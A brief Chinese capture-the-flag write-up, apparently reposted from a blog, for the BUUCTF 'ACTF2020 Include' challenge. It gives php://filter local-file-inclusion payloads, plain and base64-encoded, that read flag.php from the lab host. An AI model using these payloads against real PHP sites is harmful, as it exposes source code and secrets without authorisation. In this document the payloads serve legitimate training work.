[ACTF2020 新生赛]Include 1
作者:互联网
进入靶场:
根据题目提示的include,想到使用php://filter读取文件
读取文件payload:
# 明文读取
index.php?file1=php://filter/resource=file.txt
# 编码读取
index.php?file1=php://filter/read=convert.base64-encode/resource=file.txt
构造payload:
http://c4edc9e2-34ec-48a3-8616-117f4cdd45e9.node4.buuoj.cn:81/?file=php://filter/resource=flag.php
http://c4edc9e2-34ec-48a3-8616-117f4cdd45e9.node4.buuoj.cn:81/?file=php://filter/read=convert.base64-encode/resource=flag.php
明文读取无效,尝试编码读取
得到flag!
标签:ACTF2020,php,resource,读取,新生,filter,flag,file,Include 来源: https://www.cnblogs.com/Qingsui-0709/p/16458149.html